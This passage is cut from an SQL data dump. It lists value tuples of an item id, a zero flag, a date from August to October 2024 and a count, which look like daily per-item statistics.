(14,0,'20240817',3),
(355,0,'20240817',6),
(362,0,'20240818',1),
(459,0,'20240818',1),
(476,0,'20240818',1),
(484,0,'20240818',1),
(563,0,'20240818',1),
(656,0,'20240818',1),
(712,0,'20240818',1),
(776,0,'20240818',1),
(784,0,'20240818',1),
(355,0,'20240818',13),
(14,0,'20240818',14),
(459,0,'20240819',1),
(476,0,'20240819',1),
(506,0,'20240819',1),
(542,0,'20240819',1),
(546,0,'20240819',1),
(566,0,'20240819',1),
(680,0,'20240819',1),
(700,0,'20240819',1),
(703,0,'20240819',1),
(716,0,'20240819',1),
(748,0,'20240819',1),
(771,0,'20240819',1),
(780,0,'20240819',1),
(871,0,'20240819',1),
(643,0,'20240819',2),
(741,0,'20240819',2),
(650,0,'20240819',3),
(14,0,'20240819',26),
(496,0,'20240820',1),
(609,0,'20240820',1),
(650,0,'20240820',1),
(680,0,'20240820',1),
(708,0,'20240820',1),
(712,0,'20240820',1),
(771,0,'20240820',1),
(780,0,'20240820',1),
(810,0,'20240820',1),
(828,0,'20240820',1),
(836,0,'20240820',1),
(855,0,'20240820',1),
(362,0,'20240820',2),
(871,0,'20240820',2),
(900,0,'20240820',2),
(1003,0,'20240820',2),
(1010,0,'20240820',2),
(14,0,'20240820',11),
(362,0,'20240821',1),
(459,0,'20240821',1),
(469,0,'20240821',1),
(542,0,'20240821',1),
(546,0,'20240821',1),
(650,0,'20240821',1),
(776,0,'20240821',1),
(871,0,'20240821',1),
(1032,0,'20240821',1),
(1036,0,'20240821',1),
(355,0,'20240821',2),
(506,0,'20240821',2),
(1016,0,'20240821',2),
(1020,0,'20240821',2),
(14,0,'20240821',3),
(14,0,'20240822',1),
(496,0,'20240822',1),
(609,0,'20240822',1),
(855,0,'20240822',1),
(469,0,'20240823',1),
(496,0,'20240823',1),
(546,0,'20240823',1),
(563,0,'20240823',1),
(566,0,'20240823',1),
(609,0,'20240823',1),
(643,0,'20240823',1),
(656,0,'20240823',1),
(703,0,'20240823',1),
(708,0,'20240823',1),
(712,0,'20240823',1),
(741,0,'20240823',1),
(776,0,'20240823',1),
(810,0,'20240823',1),
(1052,0,'20240823',1),
(355,0,'20240823',2),
(542,0,'20240823',2),
(871,0,'20240823',2),
(1059,0,'20240823',2),
(14,0,'20240823',3),
(484,0,'20240824',1),
(605,0,'20240824',1),
(712,0,'20240824',1),
(14,0,'20240824',2),
(362,0,'20240825',1),
(459,0,'20240825',1),
(469,0,'20240825',1),
(484,0,'20240825',1),
(496,0,'20240825',1),
(506,0,'20240825',1),
(542,0,'20240825',1),
(546,0,'20240825',1),
(566,0,'20240825',1),
(605,0,'20240825',1),
(609,0,'20240825',1),
(643,0,'20240825',1),
(650,0,'20240825',1),
(680,0,'20240825',1),
(703,0,'20240825',1),
(708,0,'20240825',1),
(712,0,'20240825',1),
(716,0,'20240825',1),
(748,0,'20240825',1),
(771,0,'20240825',1),
(776,0,'20240825',1),
(780,0,'20240825',1),
(784,0,'20240825',1),
(810,0,'20240825',1),
(824,0,'20240825',1),
(828,0,'20240825',1),
(836,0,'20240825',1),
(855,0,'20240825',1),
(900,0,'20240825',1),
(1003,0,'20240825',1),
(1010,0,'20240825',1),
(1016,0,'20240825',1),
(1036,0,'20240825',1),
(1052,0,'20240825',1),
(1059,0,'20240825',1),
(476,0,'20240825',2),
(563,0,'20240825',2),
(656,0,'20240825',2),
(700,0,'20240825',2),
(741,0,'20240825',2),
(831,0,'20240825',2),
(840,0,'20240825',2),
(851,0,'20240825',2),
(859,0,'20240825',2),
(871,0,'20240825',2),
(1020,0,'20240825',2),
(1032,0,'20240825',2),
(355,0,'20240825',17),
(14,0,'20240825',41),
(459,0,'20240826',1),
(469,0,'20240826',1),
(476,0,'20240826',1),
(496,0,'20240826',1),
(563,0,'20240826',1),
(643,0,'20240826',1),
(680,0,'20240826',1),
(700,0,'20240826',1),
(716,0,'20240826',1),
(741,0,'20240826',1),
(748,0,'20240826',1),
(771,0,'20240826',1),
(776,0,'20240826',1),
(810,0,'20240826',1),
(824,0,'20240826',1),
(828,0,'20240826',1),
(831,0,'20240826',1),
(859,0,'20240826',1),
(900,0,'20240826',1),
(1036,0,'20240826',1),
(1059,0,'20240826',1),
(780,0,'20240826',2),
(784,0,'20240826',2),
(836,0,'20240826',2),
(840,0,'20240826',2),
(851,0,'20240826',2),
(855,0,'20240826',3),
(14,0,'20240826',10),
(355,0,'20240827',1),
(362,0,'20240827',1),
(459,0,'20240827',1),
(506,0,'20240827',1),
(542,0,'20240827',1),
(546,0,'20240827',1),
(566,0,'20240827',1),
(605,0,'20240827',1),
(609,0,'20240827',1),
(650,0,'20240827',1),
(700,0,'20240827',1),
(703,0,'20240827',1),
(708,0,'20240827',1),
(712,0,'20240827',1),
(716,0,'20240827',1),
(748,0,'20240827',1),
(771,0,'20240827',1),
(776,0,'20240827',1),
(810,0,'20240827',1),
(824,0,'20240827',1),
(828,0,'20240827',1),
(840,0,'20240827',1),
(851,0,'20240827',1),
(859,0,'20240827',1),
(14,0,'20240827',15),
(605,0,'20240828',1),
(643,0,'20240828',1),
(680,0,'20240828',1),
(1003,0,'20240828',1),
(1016,0,'20240828',1),
(1036,0,'20240828',1),
(14,0,'20240828',7),
(355,0,'20240829',1),
(459,0,'20240829',1),
(476,0,'20240829',1),
(650,0,'20240829',1),
(656,0,'20240829',1),
(700,0,'20240829',1),
(716,0,'20240829',1),
(748,0,'20240829',1),
(780,0,'20240829',1),
(810,0,'20240829',1),
(824,0,'20240829',1),
(828,0,'20240829',1),
(831,0,'20240829',1),
(836,0,'20240829',1),
(840,0,'20240829',1),
(855,0,'20240829',1),
(859,0,'20240829',1),
(871,0,'20240829',1),
(1010,0,'20240829',1),
(1020,0,'20240829',1),
(1032,0,'20240829',1),
(1036,0,'20240829',1),
(1052,0,'20240829',1),
(605,0,'20240829',2),
(362,0,'20240829',5),
(14,0,'20240829',19),
(362,0,'20240830',1),
(459,0,'20240830',1),
(506,0,'20240830',1),
(542,0,'20240830',1),
(566,0,'20240830',1),
(643,0,'20240830',1),
(703,0,'20240830',1),
(716,0,'20240830',1),
(771,0,'20240830',1),
(776,0,'20240830',1),
(780,0,'20240830',1),
(784,0,'20240830',1),
(828,0,'20240830',1),
(831,0,'20240830',1),
(836,0,'20240830',1),
(840,0,'20240830',1),
(851,0,'20240830',1),
(855,0,'20240830',1),
(859,0,'20240830',1),
(900,0,'20240830',1),
(1010,0,'20240830',1),
(1016,0,'20240830',1),
(1020,0,'20240830',1),
(1059,0,'20240830',1),
(355,0,'20240830',2),
(469,0,'20240830',2),
(546,0,'20240830',2),
(650,0,'20240830',2),
(824,0,'20240830',2),
(871,0,'20240830',2),
(1003,0,'20240830',2),
(1032,0,'20240830',2),
(1036,0,'20240830',2),
(1052,0,'20240830',4),
(14,0,'20240830',19),
(469,0,'20240831',1),
(476,0,'20240831',1),
(484,0,'20240831',1),
(506,0,'20240831',1),
(566,0,'20240831',1),
(605,0,'20240831',1),
(650,0,'20240831',1),
(771,0,'20240831',1),
(784,0,'20240831',1),
(362,0,'20240831',2),
(14,0,'20240831',8),
(355,0,'20240901',1),
(362,0,'20240901',1),
(506,0,'20240901',1),
(542,0,'20240901',1),
(546,0,'20240901',1),
(716,0,'20240901',1),
(780,0,'20240901',1),
(824,0,'20240901',1),
(851,0,'20240901',1),
(871,0,'20240901',1),
(1003,0,'20240901',1),
(469,0,'20240901',2),
(650,0,'20240901',2),
(14,0,'20240901',6),
(355,0,'20240902',1),
(362,0,'20240902',1),
(459,0,'20240902',1),
(469,0,'20240902',1),
(476,0,'20240902',1),
(506,0,'20240902',1),
(542,0,'20240902',1),
(546,0,'20240902',1),
(680,0,'20240902',1),
(703,0,'20240902',1),
(708,0,'20240902',1),
(712,0,'20240902',1),
(771,0,'20240902',1),
(776,0,'20240902',1),
(780,0,'20240902',1),
(784,0,'20240902',1),
(824,0,'20240902',1),
(828,0,'20240902',1),
(831,0,'20240902',1),
(836,0,'20240902',1),
(840,0,'20240902',1),
(851,0,'20240902',1),
(855,0,'20240902',1),
(859,0,'20240902',1),
(1016,0,'20240902',1),
(1020,0,'20240902',1),
(1032,0,'20240902',1),
(1036,0,'20240902',1),
(1052,0,'20240902',1),
(1059,0,'20240902',1),
(566,0,'20240902',2),
(716,0,'20240902',2),
(900,0,'20240902',2),
(1003,0,'20240902',2),
(1010,0,'20240902',2),
(14,0,'20240902',7),
(563,0,'20240903',1),
(609,0,'20240903',1),
(643,0,'20240903',1),
(871,0,'20240903',1),
(1032,0,'20240903',1),
(1052,0,'20240903',1),
(14,0,'20240903',2),
(355,0,'20240904',1),
(566,0,'20240904',1),
(780,0,'20240904',1),
(859,0,'20240904',1),
(900,0,'20240904',1),
(1003,0,'20240904',1),
(605,0,'20240904',2),
(14,0,'20240904',10),
(476,0,'20240905',1),
(484,0,'20240905',1),
(542,0,'20240905',1),
(563,0,'20240905',1),
(566,0,'20240905',1),
(605,0,'20240905',1),
(609,0,'20240905',1),
(680,0,'20240905',1),
(712,0,'20240905',1),
(741,0,'20240905',1),
(771,0,'20240905',1),
(780,0,'20240905',1),
(784,0,'20240905',1),
(836,0,'20240905',1),
(1016,0,'20240905',1),
(1036,0,'20240905',1),
(1105,0,'20240905',1),
(459,0,'20240905',2),
(546,0,'20240905',2),
(708,0,'20240905',2),
(776,0,'20240905',2),
(859,0,'20240905',2),
(1052,0,'20240905',2),
(1059,0,'20240905',2),
(14,0,'20240905',6),
(476,0,'20240906',1),
(484,0,'20240906',1),
(680,0,'20240906',1),
(700,0,'20240906',1),
(703,0,'20240906',1),
(712,0,'20240906',1),
(748,0,'20240906',1),
(780,0,'20240906',1),
(810,0,'20240906',1),
(851,0,'20240906',1),
(855,0,'20240906',1),
(871,0,'20240906',1),
(1003,0,'20240906',1),
(1010,0,'20240906',1),
(656,0,'20240906',2),
(14,0,'20240906',9),
(355,0,'20240907',1),
(703,0,'20240907',1),
(831,0,'20240907',1),
(859,0,'20240907',1),
(1020,0,'20240907',1),
(1036,0,'20240907',1),
(650,0,'20240907',2),
(14,0,'20240907',8),
(496,0,'20240908',1),
(605,0,'20240908',1),
(643,0,'20240908',1),
(680,0,'20240908',1),
(700,0,'20240908',1),
(716,0,'20240908',1),
(748,0,'20240908',1),
(831,0,'20240908',1),
(836,0,'20240908',1),
(840,0,'20240908',1),
(851,0,'20240908',1),
(855,0,'20240908',1),
(859,0,'20240908',1),
(871,0,'20240908',1),
(1003,0,'20240908',1),
(1010,0,'20240908',1),
(1016,0,'20240908',1),
(1020,0,'20240908',1),
(1032,0,'20240908',1),
(1052,0,'20240908',1),
(1059,0,'20240908',1),
(469,0,'20240908',2),
(741,0,'20240908',2),
(824,0,'20240908',2),
(828,0,'20240908',2),
(900,0,'20240908',2),
(506,0,'20240908',3),
(14,0,'20240908',5),
(355,0,'20240909',1),
(362,0,'20240909',1),
(506,0,'20240909',1),
(542,0,'20240909',1),
(700,0,'20240909',1),
(784,0,'20240909',1),
(828,0,'20240909',1),
(831,0,'20240909',1),
(859,0,'20240909',1),
(703,0,'20240909',2),
(780,0,'20240909',3),
(14,0,'20240909',9),
(546,0,'20240910',1),
(650,0,'20240910',1),
(771,0,'20240910',1),
(780,0,'20240910',1),
(871,0,'20240910',1),
(784,0,'20240910',2),
(840,0,'20240910',2),
(1036,0,'20240910',2),
(1052,0,'20240910',2),
(703,0,'20240910',3),
(824,0,'20240910',3),
(14,0,'20240910',7),
(469,0,'20240911',1),
(871,0,'20240911',1),
(1036,0,'20240911',1),
(14,0,'20240911',6),
(362,0,'20240912',1),
(605,0,'20240912',1),
(650,0,'20240912',1),
(748,0,'20240912',1),
(810,0,'20240912',1),
(871,0,'20240912',1),
(14,0,'20240912',8),
(703,0,'20240913',1),
(741,0,'20240913',1),
(840,0,'20240913',1),
(14,0,'20240913',8),
(355,0,'20240914',1),
(459,0,'20240914',1),
(542,0,'20240914',1),
(546,0,'20240914',1),
(563,0,'20240914',1),
(566,0,'20240914',1),
(605,0,'20240914',1),
(609,0,'20240914',1),
(643,0,'20240914',1),
(656,0,'20240914',1),
(703,0,'20240914',1),
(708,0,'20240914',1),
(712,0,'20240914',1),
(771,0,'20240914',1),
(776,0,'20240914',1),
(780,0,'20240914',1),
(810,0,'20240914',1),
(824,0,'20240914',1),
(14,0,'20240914',2),
(784,0,'20240914',2),
(362,0,'20240915',1),
(780,0,'20240915',1),
(1020,0,'20240915',1),
(1032,0,'20240915',1),
(1059,0,'20240915',1),
(14,0,'20240915',13),
(542,0,'20240916',1),
(546,0,'20240916',1),
(650,0,'20240916',1),
(703,0,'20240916',1),
(712,0,'20240916',1),
(741,0,'20240916',1),
(871,0,'20240916',1),
(1016,0,'20240916',1),
(1032,0,'20240916',1),
(355,0,'20240916',2),
(362,0,'20240916',2),
(459,0,'20240916',2),
(469,0,'20240916',2),
(484,0,'20240916',2),
(496,0,'20240916',2),
(563,0,'20240916',2),
(566,0,'20240916',2),
(605,0,'20240916',2),
(609,0,'20240916',2),
(643,0,'20240916',2),
(656,0,'20240916',2),
(680,0,'20240916',2),
(700,0,'20240916',2),
(708,0,'20240916',2),
(716,0,'20240916',2),
(771,0,'20240916',2),
(776,0,'20240916',2),
(780,0,'20240916',2),
(784,0,'20240916',2),
(810,0,'20240916',2),
(831,0,'20240916',2),
(836,0,'20240916',2),
(851,0,'20240916',2),
(859,0,'20240916',2),
(1003,0,'20240916',2),
(1010,0,'20240916',2),
(1020,0,'20240916',2),
(1036,0,'20240916',2),
(1059,0,'20240916',2),
(476,0,'20240916',3),
(506,0,'20240916',3),
(748,0,'20240916',3),
(824,0,'20240916',3),
(828,0,'20240916',3),
(840,0,'20240916',3),
(855,0,'20240916',3),
(900,0,'20240916',3),
(1052,0,'20240916',3),
(14,0,'20240916',9),
(650,0,'20240917',1),
(680,0,'20240917',1),
(831,0,'20240917',1),
(836,0,'20240917',1),
(14,0,'20240917',8),
(506,0,'20240918',1),
(14,0,'20240918',6),
(469,0,'20240919',1),
(496,0,'20240919',1),
(871,0,'20240919',1),
(1003,0,'20240919',1),
(1010,0,'20240919',1),
(1016,0,'20240919',1),
(1020,0,'20240919',1),
(1032,0,'20240919',1),
(1036,0,'20240919',1),
(1052,0,'20240919',1),
(1059,0,'20240919',1),
(14,0,'20240919',7),
(355,0,'20240920',1),
(14,0,'20240920',3),
(605,0,'20240921',1),
(824,0,'20240921',1),
(900,0,'20240921',1),
(840,0,'20240921',2),
(14,0,'20240921',4),
(840,0,'20240922',1),
(14,0,'20240922',8),
(14,0,'20240923',2),
(840,0,'20240923',2),
(605,0,'20240924',1),
(840,0,'20240924',2),
(14,0,'20240924',12),
(355,0,'20240925',1),
(362,0,'20240925',1),
(469,0,'20240925',1),
(476,0,'20240925',1),
(506,0,'20240925',1),
(542,0,'20240925',1),
(546,0,'20240925',1),
(566,0,'20240925',1),
(605,0,'20240925',1),
(643,0,'20240925',1),
(650,0,'20240925',1),
(656,0,'20240925',1),
(680,0,'20240925',1),
(708,0,'20240925',1),
(741,0,'20240925',1),
(771,0,'20240925',1),
(776,0,'20240925',1),
(780,0,'20240925',1),
(784,0,'20240925',1),
(810,0,'20240925',1),
(824,0,'20240925',1),
(871,0,'20240925',1),
(900,0,'20240925',1),
(1003,0,'20240925',1),
(1010,0,'20240925',1),
(1016,0,'20240925',1),
(1020,0,'20240925',1),
(1032,0,'20240925',1),
(1036,0,'20240925',1),
(1052,0,'20240925',1),
(1059,0,'20240925',1),
(459,0,'20240925',2),
(609,0,'20240925',2),
(703,0,'20240925',2),
(712,0,'20240925',2),
(828,0,'20240925',2),
(831,0,'20240925',2),
(836,0,'20240925',2),
(851,0,'20240925',2),
(855,0,'20240925',2),
(859,0,'20240925',2),
(840,0,'20240925',3),
(14,0,'20240925',7),
(362,0,'20240926',1),
(459,0,'20240926',1),
(476,0,'20240926',1),
(484,0,'20240926',1),
(496,0,'20240926',1),
(506,0,'20240926',1),
(542,0,'20240926',1),
(546,0,'20240926',1),
(563,0,'20240926',1),
(566,0,'20240926',1),
(605,0,'20240926',1),
(609,0,'20240926',1),
(643,0,'20240926',1),
(650,0,'20240926',1),
(656,0,'20240926',1),
(680,0,'20240926',1),
(703,0,'20240926',1),
(708,0,'20240926',1),
(712,0,'20240926',1),
(716,0,'20240926',1),
(748,0,'20240926',1),
(771,0,'20240926',1),
(776,0,'20240926',1),
(780,0,'20240926',1),
(784,0,'20240926',1),
(810,0,'20240926',1),
(824,0,'20240926',1),
(828,0,'20240926',1),
(831,0,'20240926',1),
(836,0,'20240926',1),
(851,0,'20240926',1),
(855,0,'20240926',1),
(859,0,'20240926',1),
(871,0,'20240926',1),
(900,0,'20240926',1),
(1003,0,'20240926',1),
(1010,0,'20240926',1),
(1016,0,'20240926',1),
(1020,0,'20240926',1),
(1032,0,'20240926',1),
(1036,0,'20240926',1),
(1052,0,'20240926',1),
(1059,0,'20240926',1),
(700,0,'20240926',2),
(741,0,'20240926',2),
(469,0,'20240926',3),
(840,0,'20240926',4),
(355,0,'20240926',22),
(14,0,'20240926',37),
(355,0,'20240927',1),
(362,0,'20240927',1),
(484,0,'20240927',1),
(546,0,'20240927',1),
(563,0,'20240927',1),
(566,0,'20240927',1),
(605,0,'20240927',1),
(643,0,'20240927',1),
(776,0,'20240927',1),
(780,0,'20240927',1),
(840,0,'20240927',2),
(14,0,'20240927',6),
(14,0,'20240928',1),
(355,0,'20240928',1),
(476,0,'20240928',1),
(506,0,'20240928',1),
(700,0,'20240928',1),
(708,0,'20240928',1),
(716,0,'20240928',1),
(748,0,'20240928',1),
(771,0,'20240928',1),
(784,0,'20240928',1),
(840,0,'20240928',1),
(496,0,'20240929',1),
(840,0,'20240929',2),
(14,0,'20240929',16),
(362,0,'20240930',1),
(459,0,'20240930',1),
(469,0,'20240930',1),
(476,0,'20240930',1),
(484,0,'20240930',1),
(496,0,'20240930',1),
(542,0,'20240930',1),
(563,0,'20240930',1),
(566,0,'20240930',1),
(609,0,'20240930',1),
(643,0,'20240930',1),
(656,0,'20240930',1),
(703,0,'20240930',1),
(716,0,'20240930',1),
(741,0,'20240930',1),
(748,0,'20240930',1),
(771,0,'20240930',1),
(780,0,'20240930',1),
(784,0,'20240930',1),
(824,0,'20240930',1),
(828,0,'20240930',1),
(831,0,'20240930',1),
(836,0,'20240930',1),
(851,0,'20240930',1),
(855,0,'20240930',1),
(546,0,'20240930',2),
(605,0,'20240930',2),
(650,0,'20240930',2),
(708,0,'20240930',2),
(859,0,'20240930',2),
(871,0,'20240930',2),
(1010,0,'20240930',2),
(1016,0,'20240930',2),
(1020,0,'20240930',2),
(1052,0,'20240930',2),
(1059,0,'20240930',2),
(355,0,'20240930',3),
(506,0,'20240930',3),
(700,0,'20240930',3),
(712,0,'20240930',3),
(776,0,'20240930',3),
(810,0,'20240930',3),
(900,0,'20240930',3),
(1032,0,'20240930',3),
(1036,0,'20240930',3),
(680,0,'20240930',4),
(1003,0,'20240930',4),
(840,0,'20240930',5),
(14,0,'20240930',20),
(355,0,'20241001',1),
(840,0,'20241001',3),
(14,0,'20241001',11),
(355,0,'20241002',1),
(680,0,'20241002',1),
(836,0,'20241002',1),
(855,0,'20241002',1),
(900,0,'20241002',1),
(1010,0,'20241002',1),
(1016,0,'20241002',1),
(1020,0,'20241002',1),
(1032,0,'20241002',1),
(1036,0,'20241002',1),
(840,0,'20241002',2),
(14,0,'20241002',4),
(469,0,'20241003',1),
(496,0,'20241003',1),
(605,0,'20241003',1),
(708,0,'20241003',1),
(824,0,'20241003',1),
(851,0,'20241003',1),
(900,0,'20241003',1),
(840,0,'20241003',2),
(14,0,'20241003',8),
(609,0,'20241004',1),
(643,0,'20241004',1),
(840,0,'20241004',1),
(871,0,'20241004',1),
(605,0,'20241004',2),
(566,0,'20241004',3),
(355,0,'20241005',1),
(459,0,'20241005',1),
(469,0,'20241005',1),
(476,0,'20241005',1),
(484,0,'20241005',1),
(506,0,'20241005',1),
(546,0,'20241005',1),
(563,0,'20241005',1),
(605,0,'20241005',1),
(650,0,'20241005',1),
(680,0,'20241005',1),
(700,0,'20241005',1),
(703,0,'20241005',1),
(708,0,'20241005',1),
(712,0,'20241005',1),
(741,0,'20241005',1),
(771,0,'20241005',1),
(776,0,'20241005',1),
(780,0,'20241005',1),
(784,0,'20241005',1),
(810,0,'20241005',1),
(824,0,'20241005',1),
(836,0,'20241005',1),
(855,0,'20241005',1),
(859,0,'20241005',1),
(871,0,'20241005',1),
(900,0,'20241005',1),
(1003,0,'20241005',1),
(1010,0,'20241005',1),
(1016,0,'20241005',1),
(1032,0,'20241005',1),
(1036,0,'20241005',1),
(1052,0,'20241005',1),
(1059,0,'20241005',1),
(362,0,'20241005',2),
(840,0,'20241005',2),
(496,0,'20241005',3),
(542,0,'20241005',3),
(566,0,'20241005',3),
(609,0,'20241005',3),
(643,0,'20241005',3),
(656,0,'20241005',3),
(716,0,'20241005',3),
(748,0,'20241005',3),
(828,0,'20241005',3),
(831,0,'20241005',3),
(851,0,'20241005',3),
(1020,0,'20241005',3),
(14,0,'20241005',24),
(362,0,'20241006',1),
(851,0,'20241006',1),
(716,0,'20241006',2),
(840,0,'20241006',2),
(1003,0,'20241006',2),
(14,0,'20241006',5),
(650,0,'20241007',1),
(712,0,'20241007',1),
(840,0,'20241007',2),
(14,0,'20241007',12),
(643,0,'20241008',1),
(840,0,'20241008',1),
(14,0,'20241008',6),
(355,0,'20241009',1),
(459,0,'20241009',1),
(542,0,'20241009',1),
(609,0,'20241009',1),
(656,0,'20241009',1),
(703,0,'20241009',1),
(712,0,'20241009',1),
(741,0,'20241009',1),
(840,0,'20241009',1),
(650,0,'20241009',3),
(14,0,'20241009',4),
(496,0,'20241010',1),
(542,0,'20241010',1),
(609,0,'20241010',1),
(643,0,'20241010',1),
(656,0,'20241010',1),
(700,0,'20241010',1),
(716,0,'20241010',1),
(748,0,'20241010',1),
(810,0,'20241010',1),
(566,0,'20241010',2),
(680,0,'20241010',2),
(712,0,'20241010',2),
(831,0,'20241010',2),
(851,0,'20241010',2),
(900,0,'20241010',2),
(1003,0,'20241010',2),
(1020,0,'20241010',2),
(362,0,'20241010',3),
(546,0,'20241010',3),
(563,0,'20241010',3),
(605,0,'20241010',3),
(708,0,'20241010',3),
(741,0,'20241010',3),
(776,0,'20241010',3),
(828,0,'20241010',3),
(859,0,'20241010',3),
(871,0,'20241010',3),
(1032,0,'20241010',3),
(1036,0,'20241010',3),
(459,0,'20241010',4),
(650,0,'20241010',4),
(703,0,'20241010',4),
(771,0,'20241010',4),
(780,0,'20241010',4),
(784,0,'20241010',4),
(824,0,'20241010',4),
(836,0,'20241010',4),
(855,0,'20241010',4),
(1010,0,'20241010',4),
(1016,0,'20241010',4),
(1052,0,'20241010',4),
(469,0,'20241010',5),
(840,0,'20241010',5),
(1059,0,'20241010',5),
(476,0,'20241010',6),
(506,0,'20241010',7),
(484,0,'20241010',9),
(355,0,'20241010',58),
(14,0,'20241010',4610),
(362,0,'20241011',1),
(476,0,'20241011',1),
(484,0,'20241011',1),
(546,0,'20241011',1),
(563,0,'20241011',1),
(566,0,'20241011',1),
(605,0,'20241011',1),
(643,0,'20241011',1),
(700,0,'20241011',1),
(708,0,'20241011',1),
(716,0,'20241011',1),
(748,0,'20241011',1),
(771,0,'20241011',1),
(780,0,'20241011',1),
(784,0,'20241011',1),
(840,0,'20241011',1),
(14,0,'20241011',6560),
(506,0,'20241012',1),
(776,0,'20241012',1),
(840,0,'20241012',1),
(355,0,'20241012',3),
(14,0,'20241012',7),
(828,0,'20241013',1),
(840,0,'20241013',1),
(355,0,'20241013',2),
(14,0,'20241013',5),
(362,0,'20241014',1),
(459,0,'20241014',1),
(476,0,'20241014',1),
(484,0,'20241014',1),
(496,0,'20241014',1),
(506,0,'20241014',1),
(542,0,'20241014',1),
(546,0,'20241014',1),
(563,0,'20241014',1),
(566,0,'20241014',1),
(605,0,'20241014',1),
(609,0,'20241014',1),
(643,0,'20241014',1),
(656,0,'20241014',1),
(700,0,'20241014',1),
(703,0,'20241014',1),
(708,0,'20241014',1),
(712,0,'20241014',1),
(716,0,'20241014',1),
(741,0,'20241014',1),
(748,0,'20241014',1),
(771,0,'20241014',1),
(776,0,'20241014',1),
(780,0,'20241014',1),
(784,0,'20241014',1),
(810,0,'20241014',1),
(824,0,'20241014',1),
(828,0,'20241014',1),
(831,0,'20241014',1),
(836,0,'20241014',1),
(851,0,'20241014',1),
(855,0,'20241014',1),
(859,0,'20241014',1),
(900,0,'20241014',1),
(1003,0,'20241014',1),
(1010,0,'20241014',1),
(1016,0,'20241014',1),
(1020,0,'20241014',1),
(1032,0,'20241014',1),
(1052,0,'20241014',1),
(1059,0,'20241014',1),
(469,0,'20241014',2),
(650,0,'20241014',2),
(680,0,'20241014',2),
(871,0,'20241014',2),
(1036,0,'20241014',2),
(840,0,'20241014',3),
(355,0,'20241014',18),
(14,0,'20241014',137),
(362,0,'20241015',1),
(546,0,'20241015',1),
(828,0,'20241015',1),
(840,0,'20241015',2),
(605,0,'20241015',3),
(14,0,'20241015',9),
(900,0,'20241016',1),
(840,0,'20241016',2),
(14,0,'20241016',5),
(362,0,'20241017',1),
(469,0,'20241017',1),
(605,0,'20241017',1),
(609,0,'20241017',1),
(643,0,'20241017',1),
(650,0,'20241017',1),
(656,0,'20241017',1),
(703,0,'20241017',1),
(780,0,'20241017',1),
(824,0,'20241017',1),
(828,0,'20241017',1),
(871,0,'20241017',1),
(900,0,'20241017',1),
(1010,0,'20241017',1),
(1016,0,'20241017',1),
(1020,0,'20241017',1),
(1052,0,'20241017',1),
(1059,0,'20241017',1),
(496,0,'20241017',2),
(1003,0,'20241017',2),
(840,0,'20241017',3),
(14,0,'20241017',9),
(810,0,'20241018',1),
(836,0,'20241018',1),
(840,0,'20241018',1),
(900,0,'20241018',1),
(14,0,'20241018',5),
(14,0,'20241019',1),
(828,0,'20241019',1),
(831,0,'20241019',1),
(855,0,'20241019',1),
(859,0,'20241019',1),
(840,0,'20241019',3),
(459,0,'20241020',1),
(476,0,'20241020',1),
(484,0,'20241020',1),
(496,0,'20241020',1),
(506,0,'20241020',1),
(542,0,'20241020',1),
(546,0,'20241020',1),
(563,0,'20241020',1),
(566,0,'20241020',1),
(650,0,'20241020',1),
(656,0,'20241020',1),
(680,0,'20241020',1),
(703,0,'20241020',1),
(708,0,'20241020',1),
(712,0,'20241020',1),
(716,0,'20241020',1),
(748,0,'20241020',1),
(771,0,'20241020',1),
(776,0,'20241020',1),
(780,0,'20241020',1),
(784,0,'20241020',1),
(810,0,'20241020',1),
(824,0,'20241020',1),
(828,0,'20241020',1),
(831,0,'20241020',1),
(836,0,'20241020',1),
(855,0,'20241020',1),
(859,0,'20241020',1),
(900,0,'20241020',1),
(1003,0,'20241020',1),
(1010,0,'20241020',1),
(1016,0,'20241020',1),
(1020,0,'20241020',1),
(1032,0,'20241020',1),
(1036,0,'20241020',1),
(1052,0,'20241020',1),
(1059,0,'20241020',1),
(362,0,'20241020',2),
(469,0,'20241020',2),
(700,0,'20241020',2),
(741,0,'20241020',2),
(851,0,'20241020',2),
(609,0,'20241020',3),
(643,0,'20241020',3),
(840,0,'20241020',3),
(871,0,'20241020',3),
(605,0,'20241020',4),
(355,0,'20241020',17),
(14,0,'20241020',146),
(362,0,'20241021',1),
(14,0,'20241021',2),
(840,0,'20241021',3),
(362,0,'20241022',1),
(469,0,'20241022',1),
(605,0,'20241022',1),
(609,0,'20241022',1),
(643,0,'20241022',1),
(871,0,'20241022',1),
(900,0,'20241022',1),
(14,0,'20241022',11),
(14,0,'20241023',2),
(362,0,'20241024',1),
(459,0,'20241024',1),
(469,0,'20241024',1),
(476,0,'20241024',1),
(506,0,'20241024',1),
(546,0,'20241024',1),
(566,0,'20241024',1),
(605,0,'20241024',1),
(609,0,'20241024',1),
(643,0,'20241024',1),
(650,0,'20241024',1),
(703,0,'20241024',1),
(708,0,'20241024',1),
(712,0,'20241024',1),
(771,0,'20241024',1),
(776,0,'20241024',1),
(784,0,'20241024',1),
(824,0,'20241024',1),
(851,0,'20241024',1),
(855,0,'20241024',1),
(871,0,'20241024',1),
(1003,0,'20241024',1),
(1010,0,'20241024',1),
(1016,0,'20241024',1),
(1020,0,'20241024',1),
(1036,0,'20241024',1),
(1052,0,'20241024',1),
(1059,0,'20241024',1),
(355,0,'20241024',4),
(14,0,'20241024',7),
(362,0,'20241025',1),
(459,0,'20241025',1),
(476,0,'20241025',1),
(484,0,'20241025',1),
(506,0,'20241025',1),
(542,0,'20241025',1),
(546,0,'20241025',1),
(563,0,'20241025',1),
(566,0,'20241025',1),
(605,0,'20241025',1),
(609,0,'20241025',1),
(643,0,'20241025',1),
(656,0,'20241025',1),
(680,0,'20241025',1),
(700,0,'20241025',1),
(703,0,'20241025',1),
(708,0,'20241025',1),
(712,0,'20241025',1),
(716,0,'20241025',1),
(741,0,'20241025',1),
(748,0,'20241025',1),
(771,0,'20241025',1),
(776,0,'20241025',1),
(784,0,'20241025',1),
(831,0,'20241025',1),
(840,0,'20241025',1),
(859,0,'20241025',1),
(355,0,'20241025',2),
(780,0,'20241025',2),
(14,0,'20241025',7),
(506,0,'20241026',1),
(355,0,'20241026',3),
(14,0,'20241026',5),
(355,0,'20241027',1),
(362,0,'20241027',1),
(459,0,'20241027',1),
(469,0,'20241027',1),
(476,0,'20241027',1),
(546,0,'20241027',1),
(566,0,'20241027',1),
(605,0,'20241027',1),
(609,0,'20241027',1),
(643,0,'20241027',1),
(650,0,'20241027',1),
(680,0,'20241027',1),
(703,0,'20241027',1),
(708,0,'20241027',1),
(712,0,'20241027',1),
(771,0,'20241027',1),
(776,0,'20241027',1),
(780,0,'20241027',1),
(784,0,'20241027',1),
